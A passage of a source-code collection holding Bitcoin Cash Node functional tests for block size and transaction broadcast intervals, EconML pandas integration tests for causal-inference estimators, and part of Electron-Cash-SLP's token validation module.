self.assert_case("when below DEFAULT_EXCESSIVE_BLOCK_SIZE", 1, target_size)
# When at lower boundary (1MB+1), but that requires blockmaxsize to be set to 1 MB as we're going below
# the default for max generated block size (2 MB)
target_size = ONE_MEGABYTE+1
self.reinit_node(1, ["-excessiveblocksize=" + str(target_size), "-blockmaxsize=" + str(ONE_MEGABYTE)])
self.assert_case("when at lower boundary (1MB+1)", 1, target_size)
# When slighly above lower boundary (1MB+114) but still below the default for max generated block size
target_size = ONE_MEGABYTE+114
self.reinit_node(1, ["-excessiveblocksize=" + str(target_size), "-blockmaxsize=" + str(ONE_MEGABYTE)])
self.assert_case("when slightly above the lower boundary (1MB+114)", 1, target_size)
# When above the default max block size
target_size = int(DEFAULT_EXCESSIVE_BLOCK_SIZE*3.14)
self.reinit_node(1, ["-excessiveblocksize=" + str(target_size)])
self.assert_case("when above the DEFAULT_EXCESSIVE_BLOCK_SIZE", 1, target_size)
# When at the upper boundary
# can't start the node with upper_boundary as it will get OOM killed, so set it via rpc
self.reinit_node(1, [])
upper_boundary = (1 << 63) - 1
self.nodes[1].setexcessiveblock(upper_boundary)
self.assert_case("when at the upper boundary", 1, upper_boundary)
# When somewhere below upper boundary
target_size = int(upper_boundary*0.67)
self.nodes[1].setexcessiveblock(target_size)
self.assert_case("when somewhere below the upper boundary", 1, target_size)
# reset to default before exit
self.nodes[1].setexcessiveblock(DEFAULT_EXCESSIVE_BLOCK_SIZE)
if __name__ == '__main__':
GetBlockTemplateSigopsTest().main()
```
#### File: test/functional/bchn-txbroadcastinterval.py
```python
import time
from test_framework.mininode import P2PInterface, mininode_lock
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import wait_until, connect_nodes, disconnect_nodes
from scipy import stats
class InvReceiver(P2PInterface):
def __init__(self):
super().__init__()
self.invTimes = []
self.invDelays = []
def on_inv(self, message):
timeArrived = time.time()
# If an inv contains more then one transaction, then the number of invs (==samplesize)
# will be non-deterministic. This would be an error.
assert(len(message.inv) == 1)
self.invTimes.append(timeArrived)
if len(self.invTimes) > 1:
timediff = self.invTimes[-1] - self.invTimes[-2]
self.invDelays.append(timediff)
class TxBroadcastIntervalTest(BitcoinTestFramework):
# This test will have a node create a number of transactions and relay them
# to the mininode InvReceivers (one inbound and one outbound)
# according to test parameters.
# A third disconnected node is used only to create signed transactions
# The nodes are configured with "-txbroadcastrate=1" and
# "-excessiveblocksize=2000000" so that they relay at most one tx per inv
# It's convenient, because we can now define the exact number of invs
# (== sample size -1) that we want to send
# This holds true only for interval values <= 500 ms
# The mininode InvReceiver just listens and registers the delays between invs
# and constructs a sample array from these delays
# This sample is tested against a reference exponential distribution
# density with the same parameters with scipy.stats.kstest
# (See https://en.wikipedia.org/wiki/Kolmogorov%E2%80%93Smirnov_test)
# The test is accepted if the delays sample resembles the reference
# distribution -- or, more specifically, if the probability that the
# observed distribution would have occurred as a sampling of the theoretical
# exponential distribution with a probability of at least alpha
# (pvalue > alpha, default 0.001)
# There is one mininode that connects directly to the node that generates transactions.
# This tests the *inbound* connection interval.
# The first node creates an outbound connection to the second node,
# which relays the transactions instantly (-txbroadcastinterval=1)
# to the second mininode, which tests the *outbound* connection interval (= 1/2 of the inbound).
# (but is less reliable for small values of the -txbroadcastinterval)
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument("--interval", dest="interval", type=int, default=500,
help="Set the average send interval in ms")
parser.add_argument("--samplesize", dest="samplesize", type=int, default=100,
help="Set the samplesize (number of inv message delays) for testing")
parser.add_argument("--testoutbound", dest="testoutbound", action="store_true",
help="Set whether to test outbound (along inbound) connection interval")
parser.add_argument("--alpha", dest="alpha", type=float, default="0.001",
help="Set a confidence threshold for the kstest")
def set_test_params(self):
self.scale = self.options.interval / 1000
self.num_nodes = 3
args = [
["-txbroadcastinterval={}".format(self.options.interval),
"-txbroadcastrate=1", "-excessiveblocksize=2000000",
"-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)],
["-txbroadcastinterval=1",
"-txbroadcastrate=1", "-excessiveblocksize=2000000",
"-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)],
["-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)]
]
self.extra_args = args
def setup_network(self):
self.setup_nodes()
connect_nodes(self.nodes[0], self.nodes[1])
connect_nodes(self.nodes[1], self.nodes[2])
# Generate enough coins on the spending nodes
self.nodes[2].generate(20 + 100)
self.sync_all()
# Disconnect node 3 so that it doesn't broadcast the txs it creates
disconnect_nodes(self.nodes[1], self.nodes[2])
self.signedtxs = []
to = self.nodes[2].getnewaddress()
for i in range(self.options.samplesize):
txid = self.nodes[2].sendtoaddress(to, "0.00001", "comment", "comment_to", False, 2)
self.signedtxs.append(self.nodes[2].gettransaction(txid)['hex'])
def run_test(self):
inboundReceiver, outboundReceiver = InvReceiver(), InvReceiver()
self.nodes[0].add_p2p_connection(inboundReceiver)
self.nodes[1].add_p2p_connection(outboundReceiver)
for signextx in self.signedtxs:
self.nodes[0].sendrawtransaction(signextx, True)
wait_until(
lambda: len(inboundReceiver.invTimes) == self.options.samplesize,
lock=mininode_lock,
timeout=self.options.samplesize * self.options.interval / 1000 * 2)
wait_until(
lambda: len(outboundReceiver.invTimes) == self.options.samplesize,
lock=mininode_lock,
timeout=self.options.samplesize * self.options.interval / 1000)
inboundkstestresult = stats.kstest(inboundReceiver.invDelays, stats.expon(scale=self.scale).cdf)
outboundkstestresult = stats.kstest(outboundReceiver.invDelays, stats.expon(scale=self.scale / 2).cdf)
self.log.info("kstestresults for interval {}: inbound {}, outbound {}".format(
self.options.interval,
inboundkstestresult,
outboundkstestresult))
assert(inboundkstestresult.pvalue > self.options.alpha), inboundReceiver.invDelays
if self.options.testoutbound:
assert(outboundkstestresult.pvalue > self.options.alpha), outboundReceiver.invDelays
if __name__ == '__main__':
TxBroadcastIntervalTest().main()
``` |
{
"source": "1Crazymoney/EconML",
"score": 2
} |
#### File: econml/tests/test_integration.py
```python
import numpy as np
import pandas as pd
import unittest
import pytest
import keras
import tensorflow as tf
from econml.drlearner import LinearDRLearner, SparseLinearDRLearner, ForestDRLearner
from econml.dml import LinearDML, SparseLinearDML, ForestDML
from econml.ortho_forest import DMLOrthoForest, DROrthoForest
from econml.sklearn_extensions.linear_model import WeightedLasso
from econml.metalearners import XLearner, SLearner, TLearner
from sklearn.ensemble import GradientBoostingRegressor, GradientBoostingClassifier
from sklearn.linear_model import LinearRegression, MultiTaskLasso, LassoCV
from econml.ortho_iv import LinearIntentToTreatDRIV
from econml.deepiv import DeepIVEstimator
class TestPandasIntegration(unittest.TestCase):
@classmethod
def setUpClass(cls):
np.random.seed(123)
# DGP constants
cls.n_controls = 10
cls.n_features = 2
cls.n = 100
# Define data features
# Added `_df`to names to be different from the default cate_estimator names
cls.controls = [f"W{i}_df" for i in range(cls.n_controls)]
cls.features = [f"X{i}_df" for i in range(cls.n_features)]
cls.instrument = ["Z0_df"]
cls.outcome = ["Y0_df"]
cls.cont_treat = ["T0_df"]
cls.bin_treat = ["T2_df"]
cls.cat_treat = ["T_cat"]
cls.cat_treat_labels = ["None", "One", "Two"]
cls.outcome_multi = ["Y0_df", "Y1_df"]
cls.cont_treat_multi = ["T0_df", "T1_df"]
# Generate data
d = {}
d.update({w: np.random.normal(size=cls.n) for w in cls.controls})
d.update({x: np.random.normal(size=cls.n) for x in cls.features})
d.update({t: np.random.uniform(size=cls.n) for t in cls.cont_treat_multi})
d.update({t: np.random.binomial(1, 0.5, size=cls.n) for t in cls.bin_treat})
d.update({t: np.random.choice(["None", "One", "Two"], size=cls.n, p=[0.4, 0.3, 0.3]) for t in cls.cat_treat})
d.update({z: np.random.binomial(1, 0.5, size=cls.n) for z in cls.instrument})
d.update({y: np.random.normal(size=cls.n) for y in cls.outcome_multi})
cls.df = pd.DataFrame(d)
def test_dml(self):
#################################
# Single treatment and outcome #
#################################
X = TestPandasIntegration.df[TestPandasIntegration.features]
W = TestPandasIntegration.df[TestPandasIntegration.controls]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.cont_treat]
# Test LinearDML
est = LinearDML(model_y=LassoCV(), model_t=LassoCV())
est.fit(Y, T, X=X, W=W, inference='statsmodels')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary()) # Check that names propagate as expected
# Test re-fit
X1 = X.rename(columns={c: "{}_1".format(c) for c in X.columns})
est.fit(Y, T, X=X1, W=W, inference='statsmodels')
self._check_input_names(est.summary(), feat_comp=X1.columns)
# Test SparseLinearDML
est = SparseLinearDML(model_y=LassoCV(), model_t=LassoCV())
est.fit(Y, T, X=X, W=W, inference='debiasedlasso')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary()) # Check that names propagate as expected
# ForestDML
est = ForestDML(model_y=GradientBoostingRegressor(), model_t=GradientBoostingRegressor())
est.fit(Y, T, X=X, W=W, inference='blb')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
####################################
# Mutiple treatments and outcomes #
####################################
Y = TestPandasIntegration.df[TestPandasIntegration.outcome_multi]
T = TestPandasIntegration.df[TestPandasIntegration.cont_treat_multi]
# Test LinearDML
est = LinearDML(model_y=MultiTaskLasso(), model_t=MultiTaskLasso())
est.fit(Y, T, X=X, W=W, inference='statsmodels')
self._check_input_names(est.summary(), True, True) # Check that names propagate as expected
self._check_popsum_names(est.effect_inference(X).population_summary(), True)
est.fit(Y, T, X=X, W=W, inference='bootstrap') # Check bootstrap as well
self._check_input_names(est.summary(), True, True)
self._check_popsum_names(est.effect_inference(X).population_summary(), True)
# Test SparseLinearDML
est = SparseLinearDML(model_y=MultiTaskLasso(), model_t=MultiTaskLasso())
est.fit(Y, T, X=X, W=W, inference='debiasedlasso')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary(), True, True) # Check that names propagate as expected
self._check_popsum_names(est.effect_inference(X).population_summary(), True)
def test_orf(self):
# Single outcome only, ORF does not support multiple outcomes
X = TestPandasIntegration.df[TestPandasIntegration.features]
W = TestPandasIntegration.df[TestPandasIntegration.controls]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.cont_treat]
# Test DMLOrthoForest
est = DMLOrthoForest(
n_trees=100, max_depth=2, model_T=WeightedLasso(), model_Y=WeightedLasso())
est.fit(Y, T, X=X, W=W, inference='blb')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_popsum_names(est.effect_inference(X).population_summary())
# Test DROrthoForest
est = DROrthoForest(n_trees=100, max_depth=2)
T = TestPandasIntegration.df[TestPandasIntegration.bin_treat]
est.fit(Y, T, X=X, W=W, inference='blb')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_popsum_names(est.effect_inference(X).population_summary())
def test_metalearners(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
W = TestPandasIntegration.df[TestPandasIntegration.controls]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.bin_treat]
# Test XLearner
# Skipping population summary names test because bootstrap inference is too slow
est = XLearner(models=GradientBoostingRegressor(),
propensity_model=GradientBoostingClassifier(),
cate_models=GradientBoostingRegressor())
est.fit(Y, T, X=np.hstack([X, W]))
treatment_effects = est.effect(np.hstack([X, W]))
# Test SLearner
est = SLearner(overall_model=GradientBoostingRegressor())
est.fit(Y, T, X=np.hstack([X, W]))
treatment_effects = est.effect(np.hstack([X, W]))
# Test TLearner
est = TLearner(models=GradientBoostingRegressor())
est.fit(Y, T, X=np.hstack([X, W]))
treatment_effects = est.effect(np.hstack([X, W]))
def test_drlearners(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
W = TestPandasIntegration.df[TestPandasIntegration.controls]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.bin_treat]
# Test LinearDRLearner
est = LinearDRLearner(model_propensity=GradientBoostingClassifier(),
model_regression=GradientBoostingRegressor())
est.fit(Y, T, X=X, W=W, inference='statsmodels')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary(T=1))
self._check_popsum_names(est.effect_inference(X).population_summary())
# Test SparseLinearDRLearner
est = SparseLinearDRLearner(model_propensity=GradientBoostingClassifier(),
model_regression=GradientBoostingRegressor())
est.fit(Y, T, X=X, W=W, inference='debiasedlasso')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary(T=1))
self._check_popsum_names(est.effect_inference(X).population_summary())
# Test ForestDRLearner
est = ForestDRLearner(model_propensity=GradientBoostingClassifier(),
model_regression=GradientBoostingRegressor())
est.fit(Y, T, X=X, W=W, inference='blb')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_popsum_names(est.effect_inference(X).population_summary())
def test_orthoiv(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.bin_treat]
Z = TestPandasIntegration.df[TestPandasIntegration.instrument]
# Test LinearIntentToTreatDRIV
est = LinearIntentToTreatDRIV(model_Y_X=GradientBoostingRegressor(),
model_T_XZ=GradientBoostingClassifier(),
flexible_model_effect=GradientBoostingRegressor())
est.fit(Y, T, Z=Z, X=X, inference='statsmodels')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary()) # Check input names propagate
self._check_popsum_names(est.effect_inference(X).population_summary())
def test_deepiv(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.cont_treat]
Z = TestPandasIntegration.df[TestPandasIntegration.instrument]
# Test DeepIV
treatment_model = keras.Sequential([keras.layers.Dense(128, activation='relu', input_shape=(3,)),
keras.layers.Dropout(0.17),
keras.layers.Dense(64, activation='relu'),
keras.layers.Dropout(0.17),
keras.layers.Dense(32, activation='relu'),
keras.layers.Dropout(0.17)])
response_model = keras.Sequential([keras.layers.Dense(128, activation='relu', input_shape=(3,)),
keras.layers.Dropout(0.17),
keras.layers.Dense(64, activation='relu'),
keras.layers.Dropout(0.17),
keras.layers.Dense(32, activation='relu'),
keras.layers.Dropout(0.17),
keras.layers.Dense(1)])
est = DeepIVEstimator(n_components=10, # Number of gaussians in the mixture density networks)
m=lambda z, x: treatment_model(keras.layers.concatenate([z, x])), # Treatment model
h=lambda t, x: response_model(keras.layers.concatenate([t, x])), # Response model
n_samples=1 # Number of samples used to estimate the response
)
est.fit(Y, T, X=X, Z=Z)
treatment_effects = est.effect(X)
def test_cat_treatments(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.cat_treat]
# Test categorical treatments
est = LinearDML(discrete_treatment=True, linear_first_stages=False,
categories=TestPandasIntegration.cat_treat_labels)
est.fit(Y, T, X=X)
self._check_input_names(est.summary(), T_cat=True)
treat_name = "Category"
self._check_input_names(est.summary(treatment_names=[treat_name]), T_cat=True, treat_comp=[
f"{treat_name}_{t}" for t in TestPandasIntegration.cat_treat_labels[1:]])
# Check refit
est.fit(Y, T, X=X)
self._check_input_names(est.summary(), T_cat=True)
# Check refit after setting categories
est.categories = [f"{t}_1" for t in TestPandasIntegration.cat_treat_labels]
T = T.apply(lambda t: t + "_1")
est.fit(Y, T, X=X)
self._check_input_names(est.summary(), T_cat=True, treat_comp=[
f"{TestPandasIntegration.cat_treat[0]}_{t}_1" for t in
TestPandasIntegration.cat_treat_labels[1:]])
def _check_input_names(self, summary_table,
Y_multi=False, T_multi=False, T_cat=False, feat_comp=None, treat_comp=None):
index_name = np.array(summary_table.tables[0].data)[1:, 0]
if feat_comp is None:
feat_comp = TestPandasIntegration.features
if treat_comp is None:
if T_multi:
treat_comp = TestPandasIntegration.cont_treat_multi
if T_cat:
treat_comp = ["{}_{}".format(TestPandasIntegration.cat_treat[0], label)
for label in TestPandasIntegration.cat_treat_labels[1:]]
if Y_multi:
out_comp = TestPandasIntegration.outcome_multi
if T_cat or T_multi:
index_name_comp = [
f"{feat}|{outcome}|{treat}" for feat in feat_comp for outcome in out_comp for treat in treat_comp]
else:
index_name_comp = [
f"{feat}|{outcome}" for feat in feat_comp for outcome in out_comp]
else:
if T_cat or T_multi:
index_name_comp = [
f"{feat}|{treat}" for feat in feat_comp for treat in treat_comp]
else:
index_name_comp = feat_comp
np.testing.assert_array_equal(index_name, index_name_comp)
def _check_popsum_names(self, popsum, Y_multi=False):
np.testing.assert_array_equal(popsum.output_names,
TestPandasIntegration.outcome_multi if Y_multi
else TestPandasIntegration.outcome)
``` |
{
"source": "1Crazymoney/Electron-Cash-SLP",
"score": 2
} |
#### File: Electron-Cash-SLP/lib/slp_validator_0x01.py
```python
import threading
import queue
from typing import Tuple, List
import weakref
from .transaction import Transaction
from .simple_config import get_config
from . import slp
from .slp import SlpMessage, SlpParsingError, SlpUnsupportedSlpTokenType, SlpInvalidOutputMessage
from .slp_dagging import TokenGraph, ValidationJob, ValidationJobManager, ValidatorGeneric
from .bitcoin import TYPE_SCRIPT
from .util import print_error, PrintError
from . import slp_proxying # loading this module starts a thread.
from .slp_graph_search import SlpGraphSearchManager # thread is started upon instantiation
class GraphContext(PrintError):
''' Instance of the DAG cache. Uses a single per-instance
ValidationJobManager to validate SLP tokens if is_parallel=False.
If is_parallel=True, will create 1 job manager (thread) per tokenid it is
validating. '''
def __init__(self, name='GraphContext', is_parallel=False):
# Global db for shared graphs (each token_id_hex has its own graph).
self.graph_db_lock = threading.Lock()
self.graph_db = dict() # token_id_hex -> TokenGraph
self.is_parallel = is_parallel
self.job_mgrs = weakref.WeakValueDictionary() # token_id_hex -> ValidationJobManager (only used if is_parallel, otherwise self.job_mgr is used)
self.name = name
self.graph_search_mgr = SlpGraphSearchManager()
self._setup_job_mgr()
def diagnostic_name(self):
return self.name
def _setup_job_mgr(self):
if self.is_parallel:
self.job_mgr = None
else:
self.job_mgr = self._new_job_mgr()
def _new_job_mgr(self, suffix='') -> ValidationJobManager:
ret = ValidationJobManager(threadname=f'{self.name}/ValidationJobManager{suffix}', exit_when_done=self.is_parallel)
weakref.finalize(ret, print_error, f'[{ret.threadname}] finalized') # track object lifecycle
return ret
def _get_or_make_mgr(self, token_id_hex: str) -> ValidationJobManager:
''' Helper: This must be called with self.graph_db_lock held.
Creates a new job manager for token_id_hex if is_parallel=True and one
doesn't already exist, and returns it.
Returns self.job_mgr if is_parallel=False. '''
job_mgr = self.job_mgr or self.job_mgrs.get(token_id_hex) or self._new_job_mgr(token_id_hex[:4])
if job_mgr is not self.job_mgr:
# was an is_parallel setup
assert not self.job_mgr and self.is_parallel and job_mgr
self.job_mgrs[token_id_hex] = job_mgr
return job_mgr
def get_graph(self, token_id_hex) -> Tuple[TokenGraph, ValidationJobManager]:
''' Returns an existing or new graph for a particular token.
A new job manager is created for that token if self.is_parallel=True,
otherwise the shared job manager is used.'''
with self.graph_db_lock:
try:
return self.graph_db[token_id_hex], self._get_or_make_mgr(token_id_hex)
except KeyError:
pass
val = Validator_SLP1(token_id_hex)
graph = TokenGraph(val)
self.graph_db[token_id_hex] = graph
return graph, self._get_or_make_mgr(token_id_hex)
def kill_graph(self, token_id_hex):
''' Reset a graph. This will stop all the jobs for that token_id_hex. '''
with self.graph_db_lock:
try:
graph = self.graph_db.pop(token_id_hex)
job_mgr = self.job_mgrs.pop(token_id_hex, None)
except KeyError:
return
if job_mgr:
assert job_mgr is not self.job_mgr
job_mgr.kill()
elif self.job_mgr:
# todo: see if we can put this in the above 'with' block (while
# holding locks). I was hesitant to do so for fear of deadlocks.
self.job_mgr.stop_all_with_txid(token_id_hex)
graph.reset()
def kill(self):
''' Kills all jobs and resets this instance to the state it had
when freshly constructed '''
with self.graph_db_lock:
for token_id_hex, graph in self.graph_db.items():
graph.reset()
job_mgr = self.job_mgrs.pop(token_id_hex, None)
if job_mgr: job_mgr.kill()
self.graph_db.clear()
self.job_mgrs.clear()
if self.job_mgr:
self.job_mgr.kill()
self._setup_job_mgr() # re-create a new, clean instance, if needed
def setup_job(self, tx, reset=False) -> Tuple[TokenGraph, ValidationJobManager]:
""" Perform setup steps before validation for a given transaction. """
slpMsg = SlpMessage.parseSlpOutputScript(tx.outputs()[0][1])
if slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx.txid_fast()
elif slpMsg.transaction_type in ('MINT', 'SEND'):
token_id_hex = slpMsg.op_return_fields['token_id_hex']
else:
return None
if reset and not self.is_parallel:
try:
self.kill_graph(token_id_hex)
except KeyError:
pass
graph, job_mgr = self.get_graph(token_id_hex)
return graph, job_mgr
@staticmethod
def get_validation_config():
config = get_config()
try:
limit_dls = config.get('slp_validator_download_limit', None)
limit_depth = config.get('slp_validator_depth_limit', None)
proxy_enable = config.get('slp_validator_proxy_enabled', False)
except NameError: # in daemon mode (no GUI) 'config' is not defined
limit_dls = None
limit_depth = None
proxy_enable = False
return limit_dls, limit_depth, proxy_enable
@staticmethod
def get_gs_config():
config = get_config()
try:
gs_enable = config.get('slp_validator_graphsearch_enabled', False)
gs_host = config.get('slp_gs_host', None)
except NameError: # in daemon mode (no GUI) 'config' is not defined
gs_enable = False
gs_host = None
return gs_enable, gs_host
def make_job(self, tx, wallet, network, *, debug=False, reset=False, callback_done=None, **kwargs) -> ValidationJob:
"""
Basic validation job maker for a single transaction.
Creates job and starts it running in the background thread.
Returns job, or None if it was not a validatable type.
Note that the app-global 'config' object from simpe_config should be
defined before this is called.
"""
limit_dls, limit_depth, proxy_enable = self.get_validation_config()
try:
graph, job_mgr = self.setup_job(tx, reset=reset)
except (SlpParsingError, IndexError):
return
txid = tx.txid_fast()
num_proxy_requests = 0
proxyqueue = queue.Queue()
def proxy_cb(txids, results):
newres = {}
# convert from 'true/false' to (True,1) or (False,3)
for t,v in results.items():
if v:
newres[t] = (True, 1)
else:
newres[t] = (True, 3)
proxyqueue.put(newres)
first_fetch_complete = False
def fetch_hook(txids, val_job):
l = []
gs_enable, gs_host = self.get_gs_config()
network.slp_gs_host = gs_host
nonlocal first_fetch_complete
if gs_enable \
and gs_host \
and self.graph_search_mgr \
and not val_job.graph_search_job:
if val_job.root_txid in self.graph_search_mgr.search_jobs.keys() \
and self.graph_search_mgr.search_jobs[val_job.root_txid].job_complete \
and not self.graph_search_mgr.search_jobs[val_job.root_txid].search_success:
self.graph_search_mgr.search_jobs.pop(val_job.root_txid)
search_job = self.graph_search_mgr.new_search(val_job)
val_job.graph_search_job = search_job if search_job else None
elif not gs_enable and self.graph_search_mgr:
for job in self.graph_search_mgr.search_jobs.values():
job.sched_cancel()
if network.slp_validation_fetch_signal and not first_fetch_complete:
network.slp_validation_fetch_signal.emit(0)
first_fetch_complete = True
for txid in txids:
if val_job.graph_search_job:
txn = val_job.graph_search_job.get_tx(txid)
if txn:
l.append(txn)
else:
try:
l.append(wallet.transactions[txid])
except KeyError:
pass
return l
def done_callback(job):
# wait for proxy stuff to roll in
results = {}
try:
for _ in range(num_proxy_requests):
r = proxyqueue.get(timeout=5)
results.update(r)
except queue.Empty:
pass
if proxy_enable:
graph.finalize_from_proxy(results)
# Do consistency check here
# XXXXXXX
# Save validity
for t,n in job.nodes.items():
val = n.validity
if val != 0:
wallet.slpv1_validity[t] = val
job = ValidationJob(graph, txid, network,
fetch_hook=fetch_hook,
validitycache=wallet.slpv1_validity,
download_limit=limit_dls,
depth_limit=limit_depth,
debug=debug, ref=wallet,
**kwargs)
job.add_callback(done_callback)
job_mgr.add_job(job)
return job
def stop_all_for_wallet(self, wallet, timeout=None) -> List[ValidationJob]:
''' Stops all extant jobs for a particular wallet. This method is
intended to be called on wallet close so that all the work that
particular wallet enqueued can get cleaned up. This method properly
supports both is_parallel and single mode. Will return all the jobs
that matched as a list or the empty list if no jobs matched.
Optional arg timeout, if not None and positive, will make this function
wait for the jobs to complete for up to timeout seconds per job.'''
jobs = []
if self.job_mgr:
# single job manager mode
jobs = self.job_mgr.stop_all_for(wallet)
else:
# multi job-manager mode, iterate over all extant job managers
with self.graph_db_lock:
for txid, job_mgr in dict(self.job_mgrs).items():
jobs += job_mgr.stop_all_for(wallet)
if timeout is not None and timeout > 0:
for job in jobs:
if job.running:
job.exited.wait(timeout=timeout) or self.print_error(f"Warning: Job {job} wait timed out (timeout={timeout})")
return jobs
# App-wide instance. Wallets share the results of the DAG lookups.
# This instance is shared so that we don't redundantly verify tokens for each
# wallet, but rather do it app-wide. Note that when wallet instances close
# while a verification is in progress, all extant jobs for that wallet are
# stopped -- ultimately stopping the entire DAG lookup for that token if all
# wallets verifying a token are closed. The next time a wallet containing that
# token is opened, however, the validation continues where it left off.
shared_context = GraphContext(is_parallel=False) # <-- Set is_parallel=True if you want 1 thread per token (tokens validate in parallel). Otherwise there is 1 validator thread app-wide and tokens validate in series.
class Validator_SLP1(ValidatorGeneric):
prevalidation = True # indicate we want to check validation when some inputs still active.
validity_states = {
0: 'Unknown',
1: 'Valid',
2: 'Invalid: not SLP / malformed SLP',
3: 'Invalid: insufficient valid inputs',
4: 'Invalid: token type different than required'
}
def __init__(self, token_id_hex, *, enforced_token_type=1):
self.token_id_hex = token_id_hex
self.token_type = enforced_token_type
def get_info(self, tx, *, diff_testing_mode=False):
"""
Enforce internal consensus rules (check all rules that don't involve
information from inputs).
Prune if mismatched token_id_hex from this validator or SLP version other than 1.
diff_testing_mode, allows None for token_type and token_id_hex for fuzzer testing
"""
txouts = tx.outputs()
if len(txouts) < 1:
return ('prune', 2) # not SLP -- no outputs!
# We take for granted that parseSlpOutputScript here will catch all
# consensus-invalid op_return messages. In this procedure we check the
# remaining internal rules, having to do with the overall transaction.
try:
slpMsg = SlpMessage.parseSlpOutputScript(txouts[0][1])
except SlpUnsupportedSlpTokenType as e:
# for unknown types: pruning as unknown has similar effect as pruning
# invalid except it tells the validity cacher to not remember this
# tx as 'bad'
return ('prune', 0)
except SlpInvalidOutputMessage as e:
return ('prune', 2)
# Parse the SLP
if slpMsg.token_type not in [1,129]:
return ('prune', 0)
# Check that the correct token_type is enforced (type 0x01 or 0x81)
if diff_testing_mode and self.token_type is not None and self.token_type != slpMsg.token_type:
return ('prune', 4)
elif not diff_testing_mode and self.token_type != slpMsg.token_type:
return ('prune', 4)
if slpMsg.transaction_type == 'SEND':
token_id_hex = slpMsg.op_return_fields['token_id_hex']
# need to examine all inputs
vin_mask = (True,)*len(tx.inputs())
# myinfo is the output sum
# Note: according to consensus rules, we compute sum before truncating extra outputs.
# print("DEBUG SLP:getinfo %.10s outputs: %r"%(tx.txid(), slpMsg.op_return_fields['token_output']))
myinfo = sum(slpMsg.op_return_fields['token_output'])
# outputs straight from the token amounts
outputs = slpMsg.op_return_fields['token_output']
elif slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx.txid_fast()
vin_mask = (False,)*len(tx.inputs()) # don't need to examine any inputs.
myinfo = 'GENESIS'
# place 'MINT' as baton signifier on the designated output
mintvout = slpMsg.op_return_fields['mint_baton_vout']
if mintvout is None:
outputs = [None,None]
else:
outputs = [None]*(mintvout) + ['MINT']
outputs[1] = slpMsg.op_return_fields['initial_token_mint_quantity']
elif slpMsg.transaction_type == 'MINT':
token_id_hex = slpMsg.op_return_fields['token_id_hex']
vin_mask = (True,)*len(tx.inputs()) # need to examine all vins, even for baton.
myinfo = 'MINT'
# place 'MINT' as baton signifier on the designated output
mintvout = slpMsg.op_return_fields['mint_baton_vout']
if mintvout is None:
outputs = [None,None]
else:
outputs = [None]*(mintvout) + ['MINT']
outputs[1] = slpMsg.op_return_fields['additional_token_quantity']
elif slpMsg.transaction_type == 'COMMIT':
return ('prune', 0)
if diff_testing_mode and self.token_id_hex is not None and token_id_hex != self.token_id_hex:
return ('prune', 0) # mismatched token_id_hex
elif not diff_testing_mode and token_id_hex != self.token_id_hex:
return ('prune', 0)
# truncate / expand outputs list to match tx outputs length
outputs = tuple(outputs[:len(txouts)])
outputs = outputs + (None,)*(len(txouts) - len(outputs))
return vin_mask, myinfo, outputs
def check_needed(self, myinfo, out_n):
if myinfo == 'MINT':
# mints are only interested in the baton input
return (out_n == 'MINT')
if myinfo == 'GENESIS':
# genesis shouldn't have any parents, so this should not happen.
raise RuntimeError('Unexpected', out_n)
# TRAN txes are only interested in integer, non-zero input contributions.
if out_n is None or out_n == 'MINT':
return False
else:
return (out_n > 0)
def validate(self, myinfo, inputs_info):
if myinfo == 'GENESIS':
if len(inputs_info) != 0:
raise RuntimeError('Unexpected', inputs_info)
return (True, 1) # genesis is always valid.
elif myinfo == 'MINT':
if not all(inp[2] == 'MINT' for inp in inputs_info):
raise RuntimeError('non-MINT inputs should have been pruned!', inputs_info)
if len(inputs_info) == 0:
return (False, 3) # no baton? invalid.
if any(inp[1] == 1 for inp in inputs_info):
# Why we use 'any' here:
# multiple 'valid' baton inputs are possible with double spending.
# technically 'valid' though miners will never confirm.
return (True, 1)
if all(inp[1] in [2,3,4] for inp in inputs_info):
return (False, 3)
return None
else:
# TRAN --- myinfo is an integer sum(outs)
# Check whether from the unknown + valid inputs there could be enough to satisfy outputs.
insum_all = sum(inp[2] for inp in inputs_info if inp[1] <= 1)
if insum_all < myinfo:
return (False, 3)
